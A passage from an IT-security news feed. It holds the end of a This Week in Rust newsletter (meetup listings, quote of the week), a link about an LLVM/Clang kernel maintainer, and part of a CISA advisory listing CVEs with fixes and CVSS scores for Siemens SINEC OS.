<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a></li>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a></li>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
<li>2026-07-09 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a></li>
<li><a href="https://www.meetup.com/hackerdojo/events/315338107/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a></li>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a></li>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a></li>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a></li>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a></li>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-09 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a></li>
<li><a href="https://www.meetup.com/rust-brisbane/events/315563251/"><strong>Rust Brisbane • July 2026</strong></a></li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a></li>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a></li>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a></li>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>if a ptr is dereferenced in a forest and nobody hears it, is it sound?</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/does-the-indirection-of-a-pointer-immediately-create-a-reference/141071/10">Kornel on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1785">Cerber-Ursi</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ureq0r/this_week_in_rust_659/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Desaulniers returns as a maintainer for LLVM/Clang support in the kernel: "I'm coming back. I will return. I will possess your body, and I'll make LKML burn."]]></title>
<description><![CDATA[submitted by    /u/anh0516   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655745/linux-tipps/nick-desaulniers-returns-as-a-maintainer-for-llvmclang-support-in-the-kernel-im-coming-back-i-will-return-i-will-possess-your-body-and-ill-make-lkml-burn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655745/linux-tipps/nick-desaulniers-returns-as-a-maintainer-for-llvmclang-support-in-the-kernel-im-coming-back-i-will-return-i-will-possess-your-body-and-ill-make-lkml-burn/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/anh0516"> /u/anh0516 </a> <br> <span><a href="https://www.phoronix.com/news/Nick-Desaulniers-LLVM-Linux">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uqt0th/nick_desaulniers_returns_as_a_maintainer_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Siemens SINEC OS]]></title>
<description><![CDATA[View CSAF
Summary
SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.
The following versions of Siemens SINEC OS are affected:

RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/cork. The "*...]]></description>
<link>https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-05.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.</strong></p>
<p>The following versions of Siemens SINEC OS are affected:</p>
<ul>
<li>RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/&lt;4.0 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>Siemens</td>
<td>Siemens SINEC OS</td>
<td>Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Resource Shutdown or Release, Integer Overflow or Wraparound, Stack-based Buffer Overflow, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Uncontrolled Recursion, Out-of-bounds Read, Covert Timing Channel, Improper Input Validation, Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'), Improper Update of Reference Count, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), Multiple Releases of Same Resource or Handle, Permissive Regular Expression, Expired Pointer Dereference, Incorrect Bitwise Shift of Integer, Out-of-bounds Write, User Interface (UI) Misrepresentation of Critical Information, Improper Access Control, Insertion of Sensitive Information Into Sent Data, Inefficient Algorithmic Complexity, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Authentication Bypass by Primary Weakness, NULL Pointer Dereference, Active Debug Code, Loop with Unreachable Exit Condition ('Infinite Loop'), Missing Synchronization, External Control of File Name or Path, Privilege Dropping / Lowering Errors, Use of Web Browser Cache Containing Sensitive Information</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing, Transportation Systems, Energy, Healthcare and Public Health, Financial Services, Government Services and Facilities</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1352</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU elfutils 0.192 and classified as critical. This vulnerability affects the function __libdw_thread_tail in the library libdw_alloc.c of the component eu-readelf. The manipulation of the argument w leads to memory corruption. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is 2636426a091bd6c6f7f02e49ab20d4cdc6bfc753. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1352">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1376</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1376">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404 Improper Resource Shutdown or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6052</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6052">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6141</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU ncurses up to 6.5-20250322 and classified as problematic. This vulnerability affects the function postprocess_termcap of the file tinfo/parse_entry.c. The manipulation leads to stack-based buffer overflow. The attack needs to be approached locally. Upgrading to version 6.5-20250329 is able to address this issue. It is recommended to upgrade the affected component.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6141">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6170</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6170">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-7039</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-7039">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-8732</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2 up to 2.14.5. It has been declared as problematic. This vulnerability affects the function xmlParseSGMLCatalog of the component xmlcatalog. The manipulation leads to uncontrolled recursion. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The code maintainer explains, that "[t]he issue can only be triggered with untrusted SGML catalogs and it makes absolutely no sense to use untrusted catalogs. I also doubt that anyone is still using SGML catalogs at all."</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-8732">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9086</a></h3>
<div class="csaf-accordion-content">
<p>1. A cookie is set using the `secure` keyword for `https://target` 2. curl is redirected to or otherwise made to speak with `http://target` (same hostname, but using clear text HTTP) using the same cookie set 3. The same cookie name is set - but with just a slash as path (`path=\"/\",`). Since this site is not secure, the cookie *should* just be ignored. 4. A bug in the path comparison logic makes curl read outside a heap buffer boundary The bug either causes a crash or it potentially makes the comparison come to the wrong conclusion and lets the clear-text site override the contents of the secure cookie, contrary to expectations and depending on the memory contents immediately following the single-byte allocation that holds the path. The presumed and correct behavior would be to plainly ignore the second set of the cookie since it was already set as secure on a secure host so overriding it on an insecure host should not be okay.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9230</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
